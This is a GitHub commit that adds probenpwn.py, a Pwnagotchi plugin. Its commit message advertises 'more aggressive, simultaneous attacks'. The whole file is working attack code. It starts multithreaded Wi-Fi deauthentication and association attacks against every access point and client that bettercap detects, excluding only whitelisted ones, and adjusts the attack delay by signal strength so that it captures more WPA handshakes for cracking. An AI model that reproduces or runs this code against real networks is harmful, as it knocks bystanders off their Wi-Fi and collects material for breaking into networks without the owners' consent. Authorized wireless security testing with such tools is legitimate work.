Create probenpwn.py

More aggressive, simultaneous attacks thanks to multithreading, which allows you to target multiple APs and clients at once.

Dynamic attack delays based on signal strength, ensuring more efficient attacks and better targeting of weak or strong signals.

Greater handshake capture success rate through dual attacks (deauth + association) and a refined attack strategy that adapts to real-time conditions.

Full control over your attack strategy, including the ability to exclude specific networks and clients via whitelists.

Enhanced logging for better tracking of every handshake capture and attack attempt, providing deeper insights into your progress.
This commit is contained in:
AlienMajik
2025-02-02 17:15:19 -08:00
committed by GitHub
parent 583105e4aa
commit 1e586cb5e6

139
probenpwn.py Normal file
View File

@ -0,0 +1,139 @@
import logging
import time
import threading
import pwnagotchi.plugins as plugins
class probenpwn(plugins.Plugin):
__author__ = 'AlienMajik'
__version__ = '1.0.0'
__license__ = 'GPL3'
__description__ = 'Pwn more aggressively. Launch immediate associate or deauth attack when bettercap spots a device, with enhanced performance for more handshakes.'
def __init__(self):
logging.debug("ProbeNpwn plugin created")
self._agent = None
self.old_name = None
self.recents = {}
self.whitelist = set()
self.attack_threads = []
self.epoch_duration = 60 # Define a default epoch duration (seconds)
# called before the plugin is unloaded
def on_unload(self, ui):
if self.old_name:
ui.set('name', "%s " % self.old_name)
else:
ui.set('name', "%s> " % ui.get('name')[:-3])
self.old_name = None
logging.info("probing out.")
# called to setup the UI elements
def on_ui_setup(self, ui):
self._ui = ui
def on_ui_update(self, ui):
if self.old_name is None:
self.old_name = ui.get('name')
if self.old_name:
i = self.old_name.find('>')
if i:
ui.set('name', "%s%s" % (self.old_name[:i], "!!!"))
# called when everything is ready and the main loop is about to start
def on_ready(self, agent):
self._agent = agent
logging.info("Probed and Pwnd!")
agent.run("wifi.clear")
if self._ui:
self._ui.set("status", "Probing!\nPWNING THEM GUTS!")
def track_recent(self, ap, cl=None):
ap['_track_time'] = time.time()
self.recents[ap['mac'].lower()] = ap
if cl:
cl['_track_time'] = ap['_track_time']
self.recents[cl['mac'].lower()] = cl
def ok_to_attack(self, ap):
if not self._agent:
return False
if ap['hostname'].lower() in self.whitelist or ap['mac'].lower() in self.whitelist:
return False
return True
def attack_target(self, agent, ap, cl):
if not self.ok_to_attack(ap):
return
logging.debug(f"Launching attack on AP {ap['mac']} and client {cl['mac']}")
# Perform deauth attack
agent.deauth(ap, cl, self.dynamic_attack_delay(ap, cl))
# Perform associate attack
agent.associate(ap, 0.2)
def dynamic_attack_delay(self, ap, cl):
# Adjust attack delay based on client signal strength or network type
if cl.get('signal', -100) < -60:
return 0.5 # Longer delay for weak signals
else:
return 0.25 # Faster attack for stronger signals
def on_bcap_wifi_ap_new(self, agent, event):
try:
ap = event['data']
if agent._config['personality']['associate'] and self.ok_to_attack(ap):
logging.debug("insta-associate: %s (%s)" % (ap['hostname'], ap['mac']))
# Start a thread to handle the attack
attack_thread = threading.Thread(target=self.attack_target, args=(agent, ap, None))
attack_thread.start()
self.attack_threads.append(attack_thread)
except Exception as e:
logging.error(f"Error in on_bcap_wifi_ap_new: {repr(e)}")
def on_bcap_wifi_client_new(self, agent, event):
try:
ap = event['data']['AP']
cl = event['data']['Client']
if agent._config['personality']['deauth'] and self.ok_to_attack(ap) and self.ok_to_attack(cl):
logging.debug("insta-deauth: %s (%s)->'%s'(%s)(%s)" % (ap['hostname'], ap['mac'],
cl['hostname'], cl['mac'], cl['vendor']))
# Start a thread for each deauth attack
attack_thread = threading.Thread(target=self.attack_target, args=(agent, ap, cl))
attack_thread.start()
self.attack_threads.append(attack_thread)
except Exception as e:
logging.error(f"Error in on_bcap_wifi_client_new: {repr(e)}")
def on_handshake(self, agent, filename, ap, cl):
logging.info(f"Handshake detected from {ap['mac']}")
if 'mac' in ap and 'mac' in cl:
amac = ap['mac'].lower()
cmac = cl['mac'].lower()
if amac in self.recents:
logging.info(f"Captured handshake from {ap['hostname']} ({ap['mac']}) -> '{cl['hostname']}' ({cl['mac']}) ({cl['vendor']})")
del self.recents[amac]
if cmac in self.recents:
del self.recents[cmac]
def on_epoch(self, agent, epoch, epoch_data):
for mac in list(self.recents):
if self.recents[mac]['_track_time'] < (time.time() - (self.epoch_duration * 2)):
del self.recents[mac]
def on_bcap_wifi_ap_updated(self, agent, event):
try:
ap = event['data']
if self.ok_to_attack(ap):
logging.debug(f"AP updated: {ap['hostname']} ({ap['mac']})")
self.track_recent(ap)
except Exception as e:
logging.error(f"Error in on_bcap_wifi_ap_updated: {repr(e)}")
def on_bcap_wifi_client_updated(self, agent, event):
try:
ap = event['data']['AP']
cl = event['data']['Client']
if self.ok_to_attack(ap) and self.ok_to_attack(cl):
logging.debug(f"Client updated: {ap['hostname']} ({ap['mac']}) -> '{cl['hostname']}' ({cl['mac']}) ({cl['vendor']})")
self.track_recent(ap, cl)
except Exception as e:
logging.error(f"Error in on_bcap_wifi_client_updated: {repr(e)}")